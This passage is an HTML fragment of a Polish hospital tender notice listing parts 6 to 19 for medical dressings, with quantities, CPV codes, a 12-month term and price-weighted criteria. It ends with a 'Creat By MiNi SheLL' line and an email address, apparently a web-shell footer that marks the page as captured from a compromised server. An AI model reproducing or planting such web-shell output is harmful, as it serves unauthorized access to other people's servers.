<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6: Kompresy gazowe niejałowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Kompresy gazowe niejałowe. 	op.	3 000
-2.	Kompresy gazowe niejałowe. 	op.	350
-3.	Kompresy gazowe niejałowe.	op.	2 500
-4.	Kompresy gazowe niejałowe.	op.	4 050.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7: Serwety jałowe z włókniny, serwety operacyjne jałowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Serweta jałowa z włókniny foliowanej. 	szt.	1 250
-2.	Serweta jałowa z włókniny foliowanej.	szt.	1 540
-3.	Serweta z włókniny.	szt.	9 600
-4.	Serweta operacyjna jałowa. 	szt.	2 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.16-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8: Włókninowe opatrunki wyspowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Włókninowy opatrunek wyspowy. 	szt.	4 300
-2.	Włókninowy opatrunek wyspowy.	szt.	400
-3.	Włókninowy opatrunek wyspowy.	szt.	900
-4.	Włókninowy opatrunek wyspowy.	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9: Kompresy jałowe, gazowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Kompres jałowy, gazowy.	op.	5 000
-2.	Kompres jałowy, gazowy.	op.	4 050.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 10: Opatrunki do stabilizacji cewników epiduralnych, plastry do stabilizacji cewników donosowych:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Opatrunek do stabilizacji cewników epiduralnych.	szt.	700
-2.	Plaster do stabilizacji cewników donosowych. 	szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11: Kompresy włókninowe jałowe, jałowe opatrunki oczne:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Kompres włókninowy, jałowy.	op.	12 600
-2.	Jałowy opatrunek oczny, włókninowy.	op.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.11-1, 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12: Kompresy włókninowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kompresy włókninowe, op. 15 600..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13: Serwety operacyjne jałowe:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Serweta operacyjna jałowa, gazowa.	op.	800
-2.	Serweta operacyjna jałowa, gazowa.	op.	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.14-2, 33.14.11.16-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14: Tupfery jałowe z gazy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tupfery jałowe z gazy, op. 4 000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.14-2, 33.14.11.19-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15: Zestawy do operacji klatki piersiowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy do operacji klatki piersiowej, zestawów 500..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.16-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16: Antyseptyczne sterylne opatrunki parafinowe z gazy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antyseptyczne sterylne opatrunki parafinowe z gazy, szt. 100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.11-1, 33.14.11.12-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17: Chusty trójkątne z tkaniny bawełnianej, setony jałowe z gazy:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Chusta trójkątna z tkaniny bawełnianej.	szt.	12
-2.	Seton jałowy z gazy.	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.14-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18: Wata bawełniana jałowa..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wata bawełniana jałowa, szt. 100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.15-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19: Chłonny opatrunek w technologii hydrofiber..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chłonny opatrunek w technologii hydrofiber, szt. 100..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin dostawy - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com